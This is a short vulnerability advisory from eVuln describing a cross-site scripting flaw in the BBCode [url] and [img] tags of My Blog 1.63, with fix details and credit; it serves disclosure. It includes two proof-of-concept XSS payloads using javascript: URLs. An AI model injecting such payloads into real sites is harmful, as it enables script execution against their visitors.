New eVuln Advisory: My Blog BBCode XSS Vulnerabilities http://evuln.com/vulns/79/summary.html --------------------Summary---------------- eVuln ID: EV0079 Software: My Blog Sowtware's Web Site: http://fuzzymonkey.net/cgi-bin/download.cgi?file=blog Versions: My Blog 1.63 Critical Level: Harmless Type: Cross-Site Scripting Class: Remote Status: Patched Exploit: Available Solution: Available Discovered by: Aliaksandr Hartsuyeu (eVuln.com) -----------------Description--------------- Arbitrary script code insertion is possible in BBcode [url] and [img] tags. --------------Exploit---------------------- Available at: http://evuln.com/vulns/79/exploit.html BBcode Cross-Site Scripting Examples: [img]javascript:alert(123)[/img] [url=javascript:alert(123)]Click me[/url] --------------Solution--------------------- Install new version: 1.65 Or Replace BBCode.pm module by new one from http://menno.b10m.net/perl/dists/HTML-BBCode-1.05.tar.gz --------------Credit----------------------- Discovered by: Aliaksandr Hartsuyeu (eVuln.com) Regards, Aliaksandr Hartsuyeu http://evuln.com